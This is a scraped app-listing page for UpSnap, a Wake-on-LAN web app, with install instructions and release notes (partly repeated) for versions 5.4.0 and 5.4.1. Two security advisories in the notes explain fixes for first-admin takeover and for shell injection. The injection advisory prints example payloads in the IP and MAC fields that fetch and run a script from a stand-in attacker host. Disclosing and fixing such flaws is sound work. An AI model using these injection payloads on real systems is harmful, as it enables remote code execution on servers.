About

UpSnap is a simple Wake-on-LAN web app with device dashboard, scheduled wake events via cron, network scanning with nmap, custom shutdown commands, user management, and 35 themes.

Notes

Information

The first user to register becomes the admin (visit http://IP:8090/_/).

Warnings

Do not expose UpSnap to the internet — shutdown commands can execute shell commands. Use a VPN for remote access.

Install

Updateable

To create a new Proxmox VE UpSnap LXC, run the command below in the Proxmox VE Shell.

bash -c "$(curl -fsSL https://raw.githubusercontent.com/community-scripts/ProxmoxVE/main/ct/upsnap.sh)"

5.4.1Latest24 days ago

[!NOTE]

UpSnap is, and always will be, free and open source software.

If someone is asking you to pay money for access to UpSnap binaries, source code, or licenses, you are being scammed.

The official and only trusted source for UpSnap is this repository (and its linked releases). Do not pay third parties for something that is provided here for free.

Changelog

Features

66ba9d94f421e416ad12491877231f6c3fa681d0: feat: Add language pt-BR (Portuguese Brazilian) (#1743) (@antraxbr666)

Others

24bdf6776d99ffe1a3e79e4b3bc205262fe39ca9: update deps (@seriousm4x)

[!NOTE]

UpSnap is, and always will be, free and open source software.

If someone is asking you to pay money for access to UpSnap binaries, source code, or licenses, you are being scammed.

The official and only trusted source for UpSnap is this repository (and its linked releases). Do not pay third parties for something that is provided here for free.

New Setup Process

https://github.com/seriousm4x/UpSnap/security/advisories/GHSA-w4jr-728f-5jhq

What changed

The initial setup process has been changed. Instead of a built-in multi-step wizard, UpSnap now directs you to create your first superuser account via the server console logs, which contain a one-time setup link generated by PocketBase.

Once you've created the superuser using that link, return to the UpSnap welcome page and click Done to continue.

Why this was necessary

In versions prior to 5.4.0, the setup wizard allowed anyone with network access to register the first superuser account if they reached the setup page before the legitimate administrator. This meant that on a publicly reachable instance, an attacker could take ownership of the application before the real admin had a chance to complete the setup.

By moving account creation out-of-band to the server console, only someone with access to the server logs (i.e. the administrator) can complete the initial setup.

[!NOTE] If you have sucessfully completed the initial setup in the past you are not affected.

RCE via Device IP and MAC Address Injection

https://github.com/seriousm4x/UpSnap/security/advisories/GHSA-6mc7-6948-w5h4

What was the issue

UpSnap allows setting custom shell commands for waking and shutting down devices. These commands support {{ DEVICE_IP }} and {{ DEVICE_MAC }} placeholders, which are replaced with the device's actual IP and MAC values before being executed on the server.

In versions prior to 5.4.0, these values were only changed by removing spaces before being substituted into the shell command. An attacker with permission to edit a device could set a malicious IP or MAC field, for example:

IP: 127.0.0.1;curl${IFS}http://attacker.com/shell.sh|sh
MAC: 00:00:00:00:00:00&&id

When the device was woken or shut down, the injected commands would execute on the server with the same privileges as UpSnap itself.

What was fixed

Backend: Before substituting {{ DEVICE_IP }} and {{ DEVICE_MAC }} into any shell command, UpSnap additionally validates both values using Go's standard net.ParseIP and net.ParseMAC. If a value somehow reaches this point in an invalid state, the command is rejected and an error is returned instead of executing.
Database: A new migration adds regex constraints to the ip and mac fields in the PocketBase schema (^((25[0-5]|(2[0-4]|1\d|[1-9]|)\d)\.?\b){4}$ for IP, ^([0-9A-Fa-f]{2}[:-]){5}([0-9A-Fa-f]{2})$ for MAC). Any write that bypasses the UI is rejected at the database level.
HTML input: The IP and MAC fields in the device form now have pattern attributes that enforce valid formats directly in the browser, preventing malformed values from being submitted in the first place.

Who is affected

Any instance where untrusted users had permission to create or edit devices. Users who are the sole administrator of their own instance and have not shared device-edit access are at lower risk.

Changelog

Bug fixes

74633e7f240a565c407f4fe4a9f8cdc974494d7b: fix: use token based superuser setup (@seriousm4x)
43f3f65d65b9e2e420136dfa16124392b073ae0f: fix: validate ip and mac addresses to prevent RCE (@seriousm4x)

Others

dfaf0eec59a4028a66b3068d2634779f30cc8156: build(deps-dev): bump @sveltejs/kit from 2.59.1 to 2.60.1 in /frontend (@dependabot[bot])
8b08585cede1528537d307280fa74488b6b0fd71: build(deps-dev): bump svelte from 5.55.5 to 5.55.7 in /frontend (@dependabot[bot])
92f9e295d5f761d874a6701245b2e38dc42cb85a: update deps (@seriousm4x)

About

UpSnap is a simple Wake-on-LAN web app with device dashboard, scheduled wake events via cron, network scanning with nmap, custom shutdown commands, user management, and 35 themes.

Notes

Information

The first user to register becomes the admin (visit http://IP:8090/_/).

Warnings

Do not expose UpSnap to the internet — shutdown commands can execute shell commands. Use a VPN for remote access.

Install

Updateable

To create a new Proxmox VE UpSnap LXC, run the command below in the Proxmox VE Shell.

bash -c "$(curl -fsSL https://raw.githubusercontent.com/community-scripts/ProxmoxVE/main/ct/upsnap.sh)"

5.4.1Latest24 days ago

[!NOTE]

UpSnap is, and always will be, free and open source software.

If someone is asking you to pay money for access to UpSnap binaries, source code, or licenses, you are being scammed.

The official and only trusted source for UpSnap is this repository (and its linked releases). Do not pay third parties for something that is provided here for free.

Changelog

Features

66ba9d94f421e416ad12491877231f6c3fa681d0: feat: Add language pt-BR (Portuguese Brazilian) (#1743) (@antraxbr666)

Others

24bdf6776d99ffe1a3e79e4b3bc205262fe39ca9: update deps (@seriousm4x)

5.4.01 months ago

[!NOTE]

UpSnap is, and always will be, free and open source software.

If someone is asking you to pay money for access to UpSnap binaries, source code, or licenses, you are being scammed.

The official and only trusted source for UpSnap is this repository (and its linked releases). Do not pay third parties for something that is provided here for free.

New Setup Process

https://github.com/seriousm4x/UpSnap/security/advisories/GHSA-w4jr-728f-5jhq

What changed

Once you've created the superuser using that link, return to the UpSnap welcome page and click Done to continue.

Why this was necessary

By moving account creation out-of-band to the server console, only someone with access to the server logs (i.e. the administrator) can complete the initial setup.

[!NOTE] If you have sucessfully completed the initial setup in the past you are not affected.

RCE via Device IP and MAC Address Injection

https://github.com/seriousm4x/UpSnap/security/advisories/GHSA-6mc7-6948-w5h4

What was the issue

IP: 127.0.0.1;curl${IFS}http://attacker.com/shell.sh|sh
MAC: 00:00:00:00:00:00&&id

When the device was woken or shut down, the injected commands would execute on the server with the same privileges as UpSnap itself.

What was fixed

Backend: Before substituting {{ DEVICE_IP }} and {{ DEVICE_MAC }} into any shell command, UpSnap additionally validates both values using Go's standard net.ParseIP and net.ParseMAC. If a value somehow reaches this point in an invalid state, the command is rejected and an error is returned instead of executing.
Database: A new migration adds regex constraints to the ip and mac fields in the PocketBase schema (^((25[0-5]|(2[0-4]|1\d|[1-9]|)\d)\.?\b){4}$ for IP, ^([0-9A-Fa-f]{2}[:-]){5}([0-9A-Fa-f]{2})$ for MAC). Any write that bypasses the UI is rejected at the database level.
HTML input: The IP and MAC fields in the device form now have pattern attributes that enforce valid formats directly in the browser, preventing malformed values from being submitted in the first place.

Who is affected

Any instance where untrusted users had permission to create or edit devices. Users who are the sole administrator of their own instance and have not shared device-edit access are at lower risk.

Changelog

Bug fixes

74633e7f240a565c407f4fe4a9f8cdc974494d7b: fix: use token based superuser setup (@seriousm4x)
43f3f65d65b9e2e420136dfa16124392b073ae0f: fix: validate ip and mac addresses to prevent RCE (@seriousm4x)

Others

dfaf0eec59a4028a66b3068d2634779f30cc8156: build(deps-dev): bump @sveltejs/kit from 2.59.1 to 2.60.1 in /frontend (@dependabot[bot])
8b08585cede1528537d307280fa74488b6b0fd71: build(deps-dev): bump svelte from 5.55.5 to 5.55.7 in /frontend (@dependabot[bot])
92f9e295d5f761d874a6701245b2e38dc42cb85a: update deps (@seriousm4x)

About

Notes

Information

Warnings

Install

What's new

UpSnap is, and always will be, free and open source software.

Changelog

Features

Others

UpSnap is, and always will be, free and open source software.

New Setup Process

What changed

Why this was necessary

RCE via Device IP and MAC Address Injection

What was the issue

What was fixed

Who is affected

Changelog

Bug fixes

Others

You might also like

DDNS-Updater

Squid

Alpine-Cinny

Kubo

About

Notes

Information

Warnings

Install

What's new

UpSnap is, and always will be, free and open source software.

Changelog

Features

Others

UpSnap is, and always will be, free and open source software.

New Setup Process

What changed

Why this was necessary

RCE via Device IP and MAC Address Injection

What was the issue

What was fixed

Who is affected

Changelog

Bug fixes

Others

You might also like

DDNS-Updater

Squid

Alpine-Cinny

Kubo